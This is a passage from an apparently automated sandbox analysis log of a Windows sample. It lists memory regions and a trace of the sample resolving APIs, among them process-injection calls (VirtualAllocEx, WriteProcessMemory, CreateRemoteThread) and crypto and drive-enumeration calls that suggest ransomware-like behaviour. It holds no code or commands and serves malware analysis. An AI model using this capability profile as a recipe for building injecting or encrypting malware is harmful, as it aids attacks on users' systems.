"c:\\windows\\syswow64\\gdi32.dll") Region: id = 2238 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2239 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2240 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2241 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2242 start_va = 0x730000 end_va = 0x8b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 2243 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2244 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2245 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2246 start_va = 0x8c0000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 2247 start_va = 0xff0000 end_va = 0x23effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 2248 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2249 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2250 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2251 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2252 start_va = 0xa50000 end_va = 0xe42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 2253 start_va = 0x758d0000 end_va = 0x759ecfff entry_point = 0x758d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2254 start_va = 0x750c0000 end_va = 0x750cbfff entry_point = 0x750c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2255 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2256 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2257 start_va = 0x74eb0000 end_va = 0x74eb4fff entry_point = 0x74eb0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2258 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2259 start_va = 0x75350000 end_va = 0x75444fff entry_point = 0x75350000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2260 start_va = 0x76c40000 end_va = 0x76d75fff entry_point = 0x76c40000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2261 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2262 start_va = 0x74ec0000 end_va = 0x750bafff entry_point = 0x74ec0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2263 start_va = 0x748e0000 end_va = 0x748e7fff entry_point = 0x748e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2264 start_va = 0x23f0000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 2265 start_va = 0x748c0000 end_va = 0x748d5fff entry_point = 0x748c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2266 start_va = 0x120000 end_va = 0x15bfff entry_point = 0x120000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2267 start_va = 0x120000 end_va = 0x15bfff entry_point = 0x120000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2268 start_va = 0x120000 end_va = 0x15bfff entry_point = 0x120000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2269 start_va = 0x120000 end_va = 0x15bfff entry_point = 0x120000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2270 start_va = 0x120000 end_va = 0x15bfff entry_point = 0x120000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2271 start_va = 0x74880000 end_va = 0x748bafff entry_point = 0x74880000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2272 start_va = 0x2660000 end_va = 0x292efff entry_point = 0x2660000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2273 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2274 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2275 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2464 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2465 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2466 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2467 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2468 start_va = 0x6b0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2469 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 2470 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 2471 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 2472 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2473 start_va = 0x2400000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2474 start_va = 0x2440000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 2475 start_va = 0x2490000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2476 start_va = 0x25e0000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 2477 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2478 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2479 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2480 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2481 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2482 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2483 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2515 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2518 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2520 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2525 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2527 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2529 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2531 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2533 start_va = 0x160000 end_va = 0x16dfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2559 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2561 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2563 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2565 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2567 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2569 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2570 start_va = 0x320000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2571 start_va = 0x2530000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 2572 start_va = 0x2580000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2573 start_va = 0x2930000 end_va = 0x296ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 2574 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2575 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2577 start_va = 0x160000 end_va = 0x16cfff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Thread: id = 169 os_tid = 0xa7c Thread: id = 170 os_tid = 0xa84 [0215.388] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateThread") returned 0x75a07a2f [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryA") returned 0x75a049d7 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteFileW") returned 0x75a089b3 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="HeapReAlloc") returned 0x772b1f6e [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="GetNativeSystemInfo") returned 0x75a110b5 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="CreateThread") returned 0x75a034d5 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="HeapAlloc") returned 0x7729e026 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="HeapDestroy") returned 0x75a035b7 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="LocalFree") returned 0x75a02d3c [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteCriticalSection") returned 0x772a45f5 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="GetComputerNameW") returned 0x75a0dd0e [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcessHeap") returned 0x75a014e9 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="SystemTimeToFileTime") returned 0x75a05a7e [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="GlobalMemoryStatusEx") returned 0x75a2d4c4 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="CreateProcessW") returned 0x75a0103d [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="WideCharToMultiByte") returned 0x75a0170d [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedIncrement") returned 0x75a01400 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemTime") returned 0x75a05a96 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFreeEx") returned 0x75a1d9c8 [0215.389] GetProcAddress (hModule=0x759f0000, lpProcName="IsBadReadPtr") returned 0x75a2d075 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiW") returned 0x75a1d5cd [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="OpenMutexW") returned 0x75a05151 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="SetEndOfFile") returned 0x75a1ce2e [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThread") returned 0x75a017ec [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="FlushFileBuffers") returned 0x75a0469b [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x772e5f41 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcess") returned 0x75a01809 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="SetErrorMode") returned 0x75a01b00 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="GetVersionExW") returned 0x75a01ae5 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="DuplicateHandle") returned 0x75a01886 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleA") returned 0x75a01245 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="AddVectoredExceptionHandler") returned 0x772e742b [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="ExitProcess") returned 0x75a07a10 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcessId") returned 0x75a011f8 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileW") returned 0x75a2830d [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiA") returned 0x75a03e8e [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="IsWow64Process") returned 0x75a0195e [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstChangeNotificationW") returned 0x75a1d851 [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextChangeNotification") returned 0x75a25c1e [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="IsProcessInJob") returned 0x75a2c7ea [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="CreateRemoteThread") returned 0x75a8416b [0215.390] GetProcAddress (hModule=0x759f0000, lpProcName="CreateNamedPipeW") returned 0x75a8414b [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="DisconnectNamedPipe") returned 0x75a841df [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="ConnectNamedPipe") returned 0x75a840fb [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetLogicalDrives") returned 0x75a05371 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetDriveTypeW") returned 0x75a0418b [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetUserDefaultUILanguage") returned 0x75a044ab [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileExW") returned 0x75a23b92 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetEnvironmentVariableW") returned 0x75a01b48 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="SetFilePointer") returned 0x75a017d1 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="InitializeCriticalSection") returned 0x772a2c42 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetTimeZoneInformation") returned 0x75a0465a [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="MultiByteToWideChar") returned 0x75a0192e [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileAttributesW") returned 0x75a1d4f7 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x75a1052f [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="OpenProcess") returned 0x75a01986 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileTime") returned 0x75a04407 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="ReleaseMutex") returned 0x75a0111e [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="LeaveCriticalSection") returned 0x77292270 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleFileNameW") returned 0x75a04950 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileTime") returned 0x75a1ecbb [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveDirectoryW") returned 0x75a844cf [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAlloc") returned 0x75a01856 [0215.391] GetProcAddress (hModule=0x759f0000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a04173 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextFileW") returned 0x75a054ee [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="EnterCriticalSection") returned 0x772922b0 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileAttributesW") returned 0x75a01b18 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="FindClose") returned 0x75a04442 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="OpenEventW") returned 0x75a015d6 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathW") returned 0x75a1d4dc [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="SetLastError") returned 0x75a011a9 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="HeapFree") returned 0x75a014c9 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="HeapCreate") returned 0x75a04a2d [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="WriteProcessMemory") returned 0x75a1d9e0 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSizeEx") returned 0x75a059e2 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstFileW") returned 0x75a04435 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedExchange") returned 0x75a01462 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeInformationW") returned 0x75a1c860 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="CreateDirectoryW") returned 0x75a04259 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="FreeLibrary") returned 0x75a034c8 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleW") returned 0x75a034b0 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcAddress") returned 0x75a01222 [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryW") returned 0x75a0492b [0215.392] GetProcAddress (hModule=0x759f0000, lpProcName="Process32FirstW") returned 0x75a28baf [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="Process32NextW") returned 0x75a2896c [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="GetLastError") returned 0x75a011c0 [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a2735f [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileW") returned 0x75a03f5c [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="CreateMutexW") returned 0x75a0424c [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="ResetEvent") returned 0x75a016dd [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="SetEvent") returned 0x75a016c5 [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="CreateEventW") returned 0x75a0183e [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForSingleObject") returned 0x75a01136 [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForMultipleObjects") returned 0x75a04220 [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="GetTickCount") returned 0x75a0110c [0215.393] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFree") returned 0x75a0186e [0215.393] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="GetIconInfo") returned 0x757b49ea [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="DrawIcon") returned 0x757b8deb [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="LoadImageW") returned 0x757afbd1 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="GetCursorPos") returned 0x757b1218 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="DefWindowProcW") returned 0x772a25dd [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="CreateWindowExW") returned 0x757a8a29 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="UnregisterClassW") returned 0x757a9f84 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="GetKeyboardLayoutList") returned 0x757b2e69 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="CharLowerA") returned 0x757b3e75 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="CharToOemW") returned 0x75801a26 [0215.406] GetProcAddress (hModule=0x75790000, lpProcName="TranslateMessage") returned 0x757a7809 [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="PeekMessageW") returned 0x757b05ba [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="DispatchMessageW") returned 0x757a787b [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="MsgWaitForMultipleObjects") returned 0x757b0b4a [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="RegisterClassExW") returned 0x757ab17d [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="SetWindowLongA") returned 0x757b6110 [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="GetWindowLongA") returned 0x757ad156 [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="CharUpperW") returned 0x757af350 [0215.407] GetProcAddress (hModule=0x75790000, lpProcName="DestroyWindow") returned 0x757a9a55 [0215.407] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x758d0000 [0215.409] GetProcAddress (hModule=0x758d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x758e6c0e [0215.409] GetProcAddress (hModule=0x758d0000, lpProcName="CryptDecodeObjectEx") returned 0x758dd718 [0215.409] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756f469d [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="GetAce") returned 0x756f45f0 [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x7570779b [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthorityCount") returned 0x756f0e0c [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756f40e6 [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756f0e24 [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="SetEntriesInAclW") returned 0x756f2a66 [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="RegCreateKeyExW") returned 0x756f40fe [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="CryptVerifySignatureW") returned 0x756ec54a [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="SetNamedSecurityInfoW") returned 0x756e9fe2 [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="GetNamedSecurityInfoW") returned 0x756ef4fd [0215.409] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756edf4e [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756edf36 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorSacl") returned 0x756f4680 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756f14d6 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756edf66 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756f4304 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756f412e [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeSecurityDescriptor") returned 0x756f4620 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756f468d [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptImportKey") returned 0x756ec532 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x756f1f59 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="OpenThreadToken") returned 0x756f432c [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756f46ad [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ee124 [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756f431c [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ec51a [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="AdjustTokenPrivileges") returned 0x756f418e [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorDacl") returned 0x756f415e [0215.410] GetProcAddress (hModule=0x756e0000, lpProcName="GetSecurityDescriptorSacl") returned 0x756f4608 [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="LookupPrivilegeValueW") returned 0x756f41b3 [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="GetLengthSid") returned 0x756f413b [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x756ecf31 [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="RegFlushKey") returned 0x7570773f [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="RegNotifyChangeKeyValue") returned 0x756ee15b [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryInfoKeyW") returned 0x756f46e7 [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756f445b [0215.411] 